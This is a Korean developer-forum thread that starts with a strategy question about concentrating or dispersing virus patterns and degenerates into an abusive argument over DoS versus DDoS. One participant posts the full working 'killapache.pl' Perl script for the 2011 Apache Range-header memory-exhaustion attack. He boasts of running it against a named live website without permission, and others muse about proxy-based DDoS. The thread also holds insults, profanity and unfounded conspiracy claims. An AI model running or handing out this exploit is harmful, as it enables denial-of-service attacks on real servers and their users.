바이러스 패턴 뭉쳐야 살까 흩어져야 살까?

cleansugar의 이미지

바이러스를 개발할 때요.

예전의 바이러스 패턴을 따라 만들면 쉽게 만들지만 백신에는 걸리기 쉽습니다.

반대로 백신 개발 할 때도 패턴만 검사하면 빠르지만 예외가 생길 수 있습니다.

음원같은 디지털 저작물을 단속을 피해 퍼뜨릴 때도 검색어를 누구나 짐작하게 하면 검색이 잘 되는 대신 차단되기도 쉽습니다.

독재자 별명을 지어서 퍼뜨릴 때도 마찬가지고요. 단, 선의의 피해자도 같은 경우가 있을 수 있습니다.

조선왕조실록도 복사해서 분산 보관되어 전란에도 살아남았다고 하죠.

이런 경우 표준화와 분산화 관련 전술을 어떻게 짜야 될까요?

탐지와 대응을 하는 게 최선인가요?

학계에서는 어떻게 보고 있고 체계적으로 이론화된 것이 있나요?

지침이 있을 법 한데요.

각종 전쟁과 관련해서 중요한 점인 것 같습니다.

병참부대의 식량을 한 곳에 모으느냐 퍼뜨리느냐.

위계구조에서 중요 기밀을 소수가 알게 하는 게 좋으냐, 아니면 배의 칸막이처럼 점조직이 좋으냐.

원자력 발전소가 폭탄에 안 맞으려면 몇 개나 모여있어야 될까?

파일시스템에서 하드디스크에 담긴 자료가 안전하려면 파일 목록을 어디에 몇개나 복사하게 만든 것이 좋을까?

아군이 수세일 때, 공격력을 얼마나 집중할 것인가?

독점 파일 포멧을 어디까지 공개해야 잘 될까?

약한 자식을 많이 낳는 게 자손을 퍼뜨리기 유리할까 소수정예가 나을까?

뭐 이런 것들과 관련해 말입니다.

스타크래프트를 하다 보면 유닛들을 시간과 공간에서 어떻게 운용하냐는 전술에 대해 고민을 무척 많이 하게 됩니다.

책도 쓰면 좋겠다는 생각도 들어서 일기에 적어두기도 했는데, 스타크노믹스란 책이 하나 나온 적이 있어서 내용이 궁금해지기도 하군요.

블리자드 사는 과정과 결과 데이터가 다 있으니까 통계내면 엄청난 패턴을 알아낼 수도 있을 겁니다.

이런 사례들에 뭔가 규칙이 있을까요?

아니면 그냥 재즈같은 즉흥적인 느낌인 건가요?

mspsys의 이미지

요즘 뭐 ddos attack 하는데 좀비PC 가 필요한 것도 아니고...

음, 저는 전문가가 아니지만, 요즘 추세가 ddos 를 좀 촌스럽게 보더라구요. resource exploit 놔두고 왜 촌스럽게 ddos 야? 이런 분위기?

저는 옛날부터 바이러스 만드는 사람들 좀 이해가 안되서... 트래픽을 끌어오고 싶으면 contents 와 SEO 로 승부를 보던가..

왜 virus 를 만드는지.. 주로 정부나 보안업체들이 만들어서 푼다는 생각을 갖고 있습니다. 자기들 일거리를 인위적으로 만들기 위해서.

옛날부터 한국에서 Active X 조장하는 걸 보니 더더욱 그런 생각이 들더군요.

암튼, 바이러스를 만드신다니 pc 용은 아닐테고 G3 용 malware 를 생각하시나본데, 보안업체에서 일하시나봐요? ㅋㅋㅋ 아니면 게임 좋아하시나?

저도 옛날에 스타크 (초창기때) 하다가 인턴넷 끊기고 하드가 한번 날아간 적이 있어서, 황당했었습니다.

del *.*;;;

PrimeMin의 이미지

이른바 '딴지'를 좀 걸려합니다.
정부나 보안업체에서 한가하게 바이러스 따위나 만들지 않습니다.
이는 이 부분에 대한 정보를 깊이있게 찾아보셨다면 그런 말씀을 못하죠.

또한 DDOS 공격을 위해서는 좀비PC가 다수 필요합니다.
IP 스푸핑이나 기타 여러 잡기술로 서비스 분산 공격이 가능은 하나,
근래에 통용되는 서비스 분산 공격 형태는 좀비 PC를 컨트롤러의 제어하에 목표 사이트에 다량의 트래픽을 일으키는 거죠.
일부 보안 전문가들이 국내 감염된 좀비 PC만 800만대라고해서 논란이 된적도 있구요...

바이러스는 단순한 명령집합으로 이루어진 코드에 가까우며,
멀웨어나 스크립트 따위와 비교조차 안되게 단순하지만 제작 기술은 몇 만배는 더 필요로하죠.

그리고... 논제로 들어갔을 때 전제되는 조건의 목적어가 애매합니다.
바이러스 패턴 뭉쳐야 백신에 안 걸릴까?로 이해해야되는건가요?
질문도 애매하고 답변하기도 애매합니다.

변화없는 미래는 존재하지 않는다.
Blog: http://gonome.tistory.com/

mspsys의 이미지

"정부나 보안업체에서 한가하게 바이러스 따위나 만들지 않습니다."

According to the British Daily Telegraph, a showreel that was played at a retirement party for the head of the Israel Defence Forces (IDF), Gabi Ashkenazi, included references to Stuxnet as one of his operational successes as the IDF chief of staff.

http://en.wikipedia.org/wiki/Stuxnet 음... 미국, 이스라엘 정부, 보안업체들은 참 한가한 거군요.

"또한 DDOS 공격을 위해서는 좀비PC가 다수 필요합니다."

apache killer script 을 다운받아서 읽어 보시면 한대의 컴퓨터로 ddos attack 을 할수 있게 되어 있습니다. 아파치 서버의 resource exploit 을 해서.

해커garage 에서 가르쳐 준데로

perl killapache.pl 통큰아이.com 50

이렇게 했더니 금방 서버 다운되던데요? (며칠전에 해봤습니다. 보안패치를 아직 안 하셨더라구요.)

보안패치가 되어 있는 서버라면 Lulzsec 이 작년에 릴 해준, 다른 script 이 또 있고.... 오늘도 아직 보안패치를 안해놨길레 보안패치 하기만을 기다리고 있습니다. 보안패치 해놓으면 다시 또 crash 되는지 test 해보려고.

암튼 ddos 공격에 좀비가 필요하다는건 몇년전 얘기겠지요. OTL

공부좀 하시길.

mspsys의 이미지

어디에 좀비가 필요하게 되어있죠? 설명좀 해줘보실레요?

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl [numforks]\n";
print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";

$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
$p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;

$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
$pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
print "host seems vuln\n";
return 1;
} else {
return 0;
}
}

if ($#ARGV < 0) {
usage;
exit;
}

if ($#ARGV > 1) {
$numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
print "Host does not seem vulnerable\n";
exit;
}
while(1) {
killapache();
}

jick의 이미지

> apache killer script 을 다운받아서 읽어 보시면 한대의 컴퓨터로 ddos attack 을 할수 있게 되어 있습니다.

DDOS는 distributed denial-of-service attack의 약자입니다. -_-

mspsys의 이미지

이런 븅신이 있나.

너가 어디서 일하는지 모르지만 구글에 Michał Zalewski 보다 너가 더 똑똑한거야?

http://en.wikipedia.org/wiki/Micha%C5%82_Zalewski 좀 공부좀 해라, 공부좀.

저 script 을 왜 올려놓은건지 알아?

저 vuln 을 알린게 Michał Zalewski 야. Michał Zalewski 쓴 2007년 메모나 읽어 봤냐? 찾아서 읽어봐.

lone computer/ 컴퓨터 한대로 이 방식대로 attack 하는걸 뭐라고 한다? DDoS. 저 사람이 개념이 없어서 말 잘못한거면, 너가 구글 본사 찾아 가서 좀 알려줄래?

"he was named one of the 15 most influential people in security" 세계 보안업계 가장 영향력 있는 15명중 한명.

너가 얼마나 똑똑해서 깝치는지 정말 모르겠는데, 그렇게 잘났으면 너가 구글찾아가서 구글 security head 를 이끌겠다고 해봐, 등신아.

그리고 뭐 네이버도 다운되냐고? 븅신아, 네이버가 아파치 돌리냐? 에효... 여기 무슨 등신들 집합소야 뭐야?

다른거 하지말고, 서버가 뭔지 컴퓨터가 뭔지, IP 가 뭔지, 트래픽이 뭔지, packet 이 뭔지, 기본 개념부터 좀 탑재해라.

나그네나그네의 이미지

통큰아이.com 대신에 www.naver.com을 넣어

perl killapache.pl www.naver.com 50

이렇게 해도 Naver의 웹 페이지 서버가 다운되던가요?

트래픽 허용량의 차이일 것 같네요.

그리고 http://en.wikipedia.org/wiki/DDoS#Distributed_attack에 보시면

A distributed denial of service attack (DDoS) occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. These systems are compromised by attackers using a variety of methods.

에서 'multiple systems flood the benndwidth or resources of a targeted system' 이라고 되어 있습니다.

한 타겟 서버에 동시에 여러 시스템이 접속해서 자원을 갉아먹기 위해, 한 대의 '명령하는 컴퓨터'와 수십 ~ 수백대의 '명령받는 컴퓨터'가 필요한 것이고, DDoS 공격 하나를 위해 수백대의 컴퓨터를 살 순 없으니 좀비 컴퓨터를 만드는 것입니다.

PrimeMin의 이미지

솔직히 이런 수준떨어지는 분과 대담하고 싶지 않지만..
너무 수준이 웃겨서 몇가지 답변 드립니다.

아.. 너무 웃겨서 어처구니 없네요..
http://en.wikipedia.org/wiki/Stuxnet

첫 소절에 보면. 이게 국가 기관에서 백신을 제작한다-가 아니라, Stuxnet에 대한 설명이 나와있는 부분이데요..
Stuxnet is a computer worm discovered in June 2010. It initially spreads via Microsoft Windows, and targets Siemens industrial software and equipment. While it is not the first time that hackers have targeted industrial systems,[1] it is the first discovered malware that spies on and subverts industrial systems,[2] and the first to include a programmable logic controller (PLC) rootkit.[3]

대충 해석하면 2010년에 발견된 슈퍼 웜이고 윈도우 운영체제에서 작동되며, 시멘이라는 산업 소프트웨어를 타겟으로 제작되었다.
최초 시도는 해커들이 산업 시설을 공격하기 위함이였으며.. 멀웨어가 어쩌고 저쩌고 말이나오지만 '국가 기관 또는 보안 업체가 만들었다'라는 근거는 문서 어디에도 찾아볼 수 없네요.
다만.. 초기에 어느 국가서부터 확산이 되었는지 나와있는 도표는 있는데... 이거보고 그런 소릴 하신건 아니시겠죠? (아.. 너무 웃깁니다 ^_^)
A study of the spread of Stuxnet by Symantec showed that the main affected countries in the early days of the infection were Iran, Indonesia and India

Stuxnet에 한글로 친절히 설명한 문서를 어느 블로그에서 찾을 수 있었으니. 좀 알고 올리세요.
http://boanin.tistory.com/198

펄 스크립트 올려서 어쩌라고 하시는건지.
이 스크립트는 그냥 다량의 트래픽을 일으키는 스크립트인데, 소형 사이트 공격하거나 무료 호스트등을 공격하면 일일 트래픽 초과하니까 당연히 연결 차단되죠.
DDOS가 뭔지 여기에 무슨 기법들이 들어가는지 개념부터 알고 답변하시길..

KLDP는 이쪽 계통에 수준 높은 분들이 아주 많이 은거하고 계십니다.
보아하니 이쪽 공부하신지 얼마되지 않으셨거나 연령이 낮으신 분 같은데.. 주관적인 의견을 등재하실 때는 근거를 기반으로 올리시기 바랍니다.
막 던지지마시구요.. 저라면 쪽 팔려서 여기 못있습니다.

변화없는 미래는 존재하지 않는다.
Blog: http://gonome.tistory.com/

mspsys의 이미지

is that right, u dumb shit?

"Gabi Ashkenazi, included references to Stuxnet as one of his operational successes as the IDF chief of staff."

Now, which part of it you do not understand? U don't understand what "one of his operational successes" mean here within this context? 영어가 안되면 번역기라도 돌려보세요.

If u can't comprehend English, I suggest u shut your fucking mouth? LOL What a stupid dumb shit god damn motherfucker!!

글구, 개인이 쓴 한글 블로그 글이 그렇게 신빙성 있는거면 너나 읽어 요.

개념은 너나 탑재하고 요. 보안업체들이 위 공격방법을 DDOS/DOS 라고 characterize 해서 공문 뿌렸는데, 너 혼자 아니라고 떠들면 아닌거임? One of the common methods, 그러니까 자주 사용되는 방법이 좀비동원이지, 좀비동원 does not mean DDOS, OK? 관련 사전 찾아보던가. 한국어 사전말고 영어사전.

사과가 과일인게 맞지만, 과일이 사과가 아니라고. 그게 이해가 안돼? 난독증 or 저능아야? 내가 말을 말자. 정말 LMFAO 다.

mspsys의 이미지

근래에 통용되는 서비스 분산 공격 형태는 좀비 PC를 컨트롤러의 제어하에 목표 사이트에 다량의 트래픽을 일으키는 거죠.

근래에 통용되는 근래에 통용되는 근래에 통용되는 근래에 통용되는 여기서 웃어주면 되는건가요? ㅋㅋㅋ

어느 근래에? 2002년도쯤?

나그네나그네의 이미지

평상시에도 제가 궁금해 했던 주제입니다 -_-;

아마 요약하면, '내가 어떤 전략을 취했을 시 상대방이 그에 반응하여 다른 전략을 내세울 수 있는 경우, 양쪽이 모두 최적의 전략을 내세울 때 어떻게 해야 이득을 최대화 할 수 있을까'와 같은 주제가 되지 않을까 싶네요.

이런 주제는 game theory쪽에서 다루는 것 같기도 하고,
observation이나 probability 등의 이야기가 들어가기도 하니 인공지능의 machine learning에도 다리를 걸쳐 있는거 같기도 하구요.
간단한 게임의 예에서는(ex : 바둑돌 가져가기 게임 ; 30개의 바둑돌이 있고 2명의 player가 번갈아가면서 4개 이하의 돌을 가져가며 마지막에 돌을 가져간 player가 패배하는 게임) algorithm적으로 접근해서 정해를 얻기도 하덥니다.

제 짧은 지식으로는 그렇습니다 -_-;

나그네나그네의 이미지

좀더 첨부하자면..

이런 주제는 어떤쪽으로 접근하든(modeling을 바닥부터 해내는 approach이든, heuristic하게 짜여진 modeling을 풀어나가야 하는 approach이든) 엄청난 양의 수학과 마주하게 되는 것 같습니다.

cleansugar의 이미지

예 그런 것 같아요.

제가 물은 건 바이러스 만드는 얘기 말고 이런 답변입니다.

재벌 2세가 재벌이 될 확률과
금메달리스트 2세가 금메달을 딸 확률이 비슷해지도록
자유오픈소스 대안화폐를 씁시다.

아이디의 아이디어 무한도전
http://blog.aaidee.com

귀태닷컴
http://www.gwitae.com

cleansugar의 이미지

창과 방패의 싸움에서 시공간 배치에 관해 구체적 전술을 어떻게 짜는 건지 지침이 있냐는 질문이예요.

재벌 2세가 재벌이 될 확률과
금메달리스트 2세가 금메달을 딸 확률이 비슷해지도록
자유오픈소스 대안화폐를 씁시다.

아이디의 아이디어 무한도전
http://blog.aaidee.com

귀태닷컴
http://www.gwitae.com

mspsys의 이미지

몰랐습니다. 그냥 제 주위 친구들? (친구들은 아니고 그냥 ICQ 등에서 잠깐 잠깐 채팅하는) 보면, 추세에 맞춰 토렌트에 바이러스를 심거나, software/media 압축해 올려놓고, newb 들이 걸려들길 바라는 정도?

아니면 password 심어놓고, 이걸 보고 싶으면/사용하고 싶으면 용돈좀 주세요 하는... 매우 고전적인데, 이런게 돈이나 되는건지...

뭐 잉여들이 다른거 할게 별로 없으니까 그런거라도 하는거 겠지만.... G3 malware 는 얼마전 싹 정리되었고, 정말 저는 모르겠습니다. 요즘 누가 바이러스를 정말 만들기나 하는건지.

바이러스 뿌려지는 pattern 을 보면, 이건 분명 보안업체/정부 소행이란 의심을 버릴수가 없네요. stuxnet 을 봐도 그렇고.

그나저나 sopa 도 그렇고 한 개인으로서 요즘 매우 불안합니다. 인터넷은 개방되어 있어야 하는 공간인데....

Stand Alone Complex의 이미지

할말이 없네요.
정말 아는게 없으신 분이군요.
아는 만큼 보입니다.
본인이 스스로 좀 더 알아보시고 글을 쓰셨으면 좋겠네요.
근거도 없이 헛소문 퍼트리지 마시고요.

RET ;My life :P

mspsys의 이미지

이런 븅신이 있나.

너가 어디서 일하는지 모르지만 구글에 Michał Zalewski 보다 너가 더 똑똑한거야?

http://en.wikipedia.org/wiki/Micha%C5%82_Zalewski 좀 공부좀 해라, 공부좀.

저 script 을 왜 올려놓은건지 알아?

저 vuln 을 알린게 Michał Zalewski 야. Michał Zalewski 쓴 2007년 메모나 읽어 봤냐? 찾아서 읽어봐.

lone computer/ 컴퓨터 한대로 이 방식대로 attack 하는걸 뭐라고 한다? DDoS. 저 사람이 개념이 없어서 말 잘못한거면, 너가 구글 본사 찾아 가서 좀 알려줄래?

"he was named one of the 15 most influential people in security" 세계 보안업계 가장 영향력 있는 15명중 한명.

Sergey Brin 한테 니네 security head 가 DDoS 가 뭔지도 잘못알고 있다고, DoS 라고 해야 맞는거라고 가르칠 기세인데? ㅋ

mspsys의 이미지

British Daily Telegraph 가 근거없는 헛소문인가요?

님아, 제가 아는게 없으니까, 님 서버가 어디에 있는지 좀 알려줘 보실레요?

님 서버 가서 공부좀 할께요.

말로는 뭔 소리를 못해 요, 이 키보드 워리어 님아.

Stand Alone Complex의 이미지

DDoS와 DoS도 구분 못하는 사람과 보안을 주제로 토론하고 싶지 않네요.
저~기 가서 공부 더 하고 오세요.

RET ;My life :P

mspsys의 이미지

In its simplest form, a Distributed Denial of Service (DDoS) attack is a DoS attack that occurs from more than one source, and/or from more than one location, at the same time. Often, the DDoS attackers are not aware that they are engaging in a DoS attack against a site, and are duped (technically or physically) into joining the attack by a third party.

Source: Computer Crime Research Center

http://www.crime-research.org/articles/network-security-dos-ddos-attacks/

It's same thing. LOL Security firms consider them as same.

븅신아, 너나 가서 공부좀 더 하지? 사전도 한번 안 찾아봤냐? 여기서 븅신인증하3? 한국어로 쓰여진 책자말고, 영문책자보고 얘기를 하라고.

한국에서 원샷 = bottoms up 이라고 우기면, 내가 그래 그게 맞는 영어야, 이렇게 대답을 해줘야 하는거야? 그런거야? LOL

What a bunch of idiots. tsk, tsk, tsk.

mspsys의 이미지

너 수준에 뭔 말인지 모르겠구나.

중학교 수준으로 잘라줄께.

Distributed Denial of Service (DDoS) attack is a DoS attack.

A is B.

이거랑 똑같은 말이야. A 는 B 다. DDoS is DoS. 이말은 DDOS 는 DoS 다. 이런뜻이야.

너 아직 중학교도 안들어간 초딩인건 아니지? 뭔 말인지 이해하지?

Good. Now, go fuck off!!! ^^

hiseob의 이미지

나는 중학생인데 컴퓨터를 좋아해요

나는 중학생인데
로 줄여서

A = B 의 관계에서 A = 나 B = 중학생이니 나는 중학생이다. 끗?

In its simplest form, a Distributed Denial of Service (DDoS) attack is a DoS attack that occurs from more than one source, and/or from more than one location, at the same time.

조중동 입사지원이나 해라 새캬 딱 어울린다. 앞뒤 딱 자르고 깝치는꼴 보아하니 아주 훌륭한 찌라시 기자감으로 부족한점이 없다.
혹시 영어 딸려서 이 문장 (당신이 올린거 그대로 복사한거야) 해석 못할지경이면 그것도 포기하긴 해야 할거 같긴하네 ㅎㅎ

나그네나그네의 이미지

사실 cleansugar님께서 올린 글과는 전혀 다른 방향으로 이야기가 흘러가고 있는 것 같습니다만 -_-;

아쉽게도 mspsys님께서 제시하신 perl 코드는 DDoS 코드가 아니라 그냥 DoS 코드입니다 -_-;;;;;;

첫째로,

http://eromang.zataz.com/2011/08/24/cve-2011-3192-apache-httpd-killer-remote-denial-of-service/
http://dailysecu.com/news_view.php?article_id=495

에서 보이면, 이 script가 DDoS 공격이라는 말은 어디에도 없습니다. 단, remote denial of service 공격임을 명시하는 문장은 분명히 있습니다.

둘째로, DDoS는 서버에서 돌아가는 데몬의 버그(취약점)를 공격해서 서버를 마비시키는 방식이 아니라, 그저 서버에 가하는 트래픽이 상식적인 수준이 넘도록 해서 일반적인 사용자가 서버에 접근 자체를 못하도록 하는 공격입니다.

영어를 정말 좋아하시는 거 같으니 해당 부분이 정의되어 있는 en wikipedia를 레퍼런스 하겠습니다.

http://en.wikipedia.org/wiki/Denial-of-service_attack

에서 Methods of attack을 보시면,
'There are two general forms of DoS attacks: those that crash services and those that flood services.'

라고 정의되어 있습니다. 그리고, DDoS는 이 둘 중 'flooding service' 방법을 이용하는 DoS임을 알 수 있습니다.(참조 : 본문 중 'A distributed denial of service attack (DDoS) occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. These systems are compromised by attackers using a variety of methods.')

아쉽게도, mspsys님께서 보여주신 perl 코드는 'crashing services' 방법을 이용하는 DoS이군요. 제시한 코드는 DDoS 공격 코드가 아닙니다.

..

mspsys님께서 첫번째로 답변하신 글 + 답글의 답글에서는 DDoS를 언급하구 계시며,

'apache killer script 을 다운받아서 읽어 보시면 한대의 컴퓨터로 ddos attack 을 할수 있게 되어 있습니다. 아파치 서버의 resource exploit 을 해서.'

라고 하셨습니다.

결국 '한 대의 컴퓨터로 ddos attack을 할 수 있다'라는 주장은, 제시한 증거가 DDoS와 아무런 연관이 없을 뿐더러, DDoS의 정의인 'multiple system'과도 맞지 않으니 결국 틀렸다고 할 수 있겠네요.

aral1의 이미지

'영어를 정말 좋아하시는 거 같으니'
'영어를 정말 좋아하시는 거 같으니'
'영어를 정말 좋아하시는 거 같으니'
'영어를 정말 좋아하시는 거 같으니'
ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ
아기다리님 정말 위트가 넘치는 거 같습니다.

그리고 좀비PC 준비 없이도 DDoS 공격이 가능할지도 모른다는 생각이 문득 들었습니다.
예를 들어 전세계에 있는 proxy server를 몇백개 수집해서, 그 proxy들을 통해 타겟서버로 무한 request를 보낸다든지.
하긴 네트웍 업체들도 바보아닌이상 이런 시나리는 대비하고 있겠지만...
뭔가 방법이 있지 않을까요?

나그네나그네의 이미지

이제 kldp에서 올린 답글은 수정이 불가능한가요?

이 글은 꽤 오랫동안 기록에 남아 있겠군요.

미래에 올 유저들이 이 글을 읽고 guru + 고수가 넘쳐나는 kldp에서 취해야 하는 네티켓의 교본으로 삼았으면 좋겠네요..

jick의 이미지

이게 말로만 듣던 script kiddie로군요. @.@ 하지만 별로 오래 구경하고 싶지는...

그나저나 "너가 구글 본사 찾아 가서 좀 알려줄래?"라니... 일부러 의도해도 하기 힘든 개드립을...;;;

(...회사 노트북으로 이딴 댓글 달고 있는 거 알면 구글본사에서 싫어할라나. -_-)

hiseob의 이미지

이번 트롤링을 마주하면서 얻은 교훈

영어는 꼭 공부해야 어디가서 병신취급 안당한다.

distributed 가 뭔지 몰라서 까이는 도중에 남을 병신취급하면 왕따가 나는 남들을 왕따하는중이라고 자위하는거나 무슨차인지.

cz201의 이미지

서비스 거부 공격을 DOS라고 합니다.

다수의 시스템(PC)를 이용하는 서비스 거부 공격을 DDOS라고 합니다.

즉 한나의 시스템을 이용하여 서비스 거부 공격을 한다면, 그건 이미 DDOS가 아니란 거죠 -_-;;